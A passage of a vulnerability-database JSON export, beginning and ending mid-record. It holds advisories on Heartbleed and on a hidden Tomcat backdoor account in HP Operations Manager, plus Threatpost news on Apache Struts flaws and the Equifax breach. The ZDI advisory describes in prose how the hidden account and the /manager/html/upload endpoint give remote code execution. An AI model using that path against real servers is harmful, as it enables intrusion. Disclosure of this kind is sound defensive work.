also\r\nhave the fix&#41;:\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus&#39;s\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity&#40;at&#41;ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n&#40;c&#41; Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library&#39;s &quot;Heart bleed&quot; vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "description": "There is a hidden undocumented Tomcat account.", "modified": "2009-11-23T00:00:00", "published": "2009-11-23T00:00:00", "id": "SECURITYVULNS:VULN:10414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10414", "title": "HP Operations Manager backdoor account", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-085\r\nNovember 20, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-3843\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Operations Manager for Windows\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9261. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard Operations Manager.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists due to a hidden account present within the\r\nTomcat users XML file. Using this account a malicious user can access\r\nthe org.apache.catalina.manager.HTMLManagerServlet class. This is\r\ndefined within the catalina-manager.jar file installed with the product.\r\nThis servlet allows a remote user to upload a file via a POST request to\r\n/manager/html/upload. If an attacker uploads malicious content it can\r\nthen be accessed and executed on the server which leads to arbitrary\r\ncode execution under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960\r\n\r\n-- Disclosure Timeline:\r\n2009-11-09 - Vulnerability reported to vendor\r\n2009-11-20 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security &#40;www.harmonysecurity.com&#41;\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n", "modified": "2009-11-23T00:00:00", "published": "2009-11-23T00:00:00", "id": "SECURITYVULNS:DOC:22821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22821", "title": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01931960\r\nVersion: 1\r\n\r\nHPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-11-18\r\nLast Updated: 2009-11-18\r\n\r\nPotential Security Impact: Remote unauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Operations Manager for Windows. The\r\nvulnerability could be exploited remotely to gain unauthorized access.\r\n\r\nReferences: CVE-2009-3843\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Operations Manager for Windows v8.10\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3843 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:N&#41; 9.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Stephen Fewer of Harmony Security working with TippingPoint&#39;s\r\nZero Day initiative for reporting this vulnerability to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made the following patch available to resolve the vulnerability. The patch is available for\r\ndownload from http://support.openview.hp.com/selfsolve/patches\r\n\r\nProduct\r\n Version\r\n Patch\r\n\r\nHP Operations Manager for Windows\r\n 8.10\r\n OMW_00032 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 18 November 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer&#39;s patch management\r\npolicy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted\r\nusing PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity.\r\nHP is continually reviewing and enhancing the security features of software products to provide\r\ncustomers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of\r\nthe affected HP products the important security information contained in this Bulletin. HP recommends\r\nthat all users determine the applicability of this information to their individual situations and\r\ntake appropriate action. HP does not warrant that this information is necessarily accurate or\r\ncomplete for all user situations and, consequently, HP will not be responsible for any damages\r\nresulting from user&#39;s use or disregard of the information provided in this Bulletin. To the extent\r\npermitted by law, HP disclaims all warranties, either express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided &quot;as is&quot; without warranty of any kind. To the extent\r\npermitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost profits;damages relating to\r\nthe procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard\r\nCompany and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product and company names mentioned herein\r\nmay be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAksERwAACgkQ4B86/C0qfVnibACgmYvkL5wCSUtU9mVpWPSwQWAY\r\nlx8AoL0P1iOjGRgCdvWxEnlNM9tKr71j\r\n=p9gT\r\n-----END PGP SIGNATURE-----", "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22818", "title": "[security bulletin] HPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:10", "bulletinFamily": "info", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "modified": "2017-09-15T13:01:13", "published": "2017-09-14T16:00:34", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "bulletinFamily": "info", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "modified": "2017-09-05T18:44:40", "published": "2017-09-05T14:10:54", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "bulletinFamily": "info", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird &amp; Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "modified": "2017-09-20T19:57:18", "published": "2017-09-11T15:02:31", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "cvss": {"score": 10.0, "vector": 